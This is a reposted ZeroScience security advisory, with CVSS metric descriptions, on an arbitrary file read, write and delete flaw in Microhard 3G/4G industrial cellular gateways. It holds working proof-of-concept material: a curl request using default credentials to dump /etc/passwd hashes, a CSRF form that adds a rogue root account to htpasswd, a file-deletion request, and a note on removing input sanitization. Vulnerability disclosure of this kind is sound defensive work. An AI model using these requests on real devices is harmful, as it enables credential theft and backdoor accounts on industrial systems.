The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Microhard Systems 3G/4G Cellular Ethernet And Serial Gateway Arbitrary File Attacks
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks
Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
IPn3Gb 2.2.0 build 2160
IPn4Gb 1.1.6 build 1184-14
IPn4Gb 1.1.0 Rev 2 build 1090-2
IPn4Gb 1.1.0 Rev 2 build 1086
Bullet-3G 1.2.0 Rev A build 1032
VIP4Gb 1.1.6 build 1204
VIP4G 1.1.6 Rev 3.0 build 1184-14
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
IPn3Gii / Bullet-3G 1.2.0 build 1076
IPn4Gii / Bullet-LTE 1.2.0 build 1078
BulletPlus 1.3.0 build 1036
Dragon-LTE 1.1.0 build 1036
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
Desc: Due to the hidden and undocumented File Editor (Filesystem Browser) shell script
'system-editor.sh' an attacker can leverage this issue to read, modify or delete arbitrary
files on the system. Input passed thru the 'path' and 'savefile', 'edit' and 'delfile' GET
and POST parameters is not properly sanitized before being used to modify files. This can
be exploited by an authenticated attacker to read or modify arbitrary files on the affected
system.
Tested on: httpd-ssl-1.0.0
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5485
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5485.php
13.03.2018
--
Download (script):
------------------
# curl "http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc&savefile=passwd" -H "Authorization: Basic YWRtaW46YWRtaW4="
root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
admin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh
upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
nobody:*:65534:65534:nobody:/var:/bin/false
testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
testingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false
msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
Edit (edit):
------------
CSRF add roOt:rewt to htpasswd:
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/webif/system-editor.sh" method="POST" enctype="multipart/form-data">
<input type="hidden" name="path" value="/etc" />
<input type="hidden" name="edit" value="htpasswd" />
<input type="hidden" name="filecontent" value="root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/
admin:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1
at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/
testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0" />
<input type="hidden" name="save" value="A Save ChangesA " />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Delete (delfile):
-----------------
GET /cgi-bin/webif/system-editor.sh?path=/www&delfile=pwn.txt HTTP/1.1
Or edit and remove sanitization:
File: /usr/lib/webif/sanitize.awk
// { _str=$0;
gsub(/ /,"",_str)
gsub(/\|/,"",_str)
gsub(/\\/,"",_str)
gsub(/&/,"",_str)
gsub(/\^/,"",_str)
gsub(/\$/,"",_str)
gsub(/'/,"",_str)
gsub(/"/,"",_str)
gsub(/`/,"",_str)
gsub(/\{/,"",_str)
gsub(/\}/,"",_str)
gsub(/\(/,"",_str)
gsub(/\)/,"",_str)
gsub(/;/,"",_str)
print _str
}
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum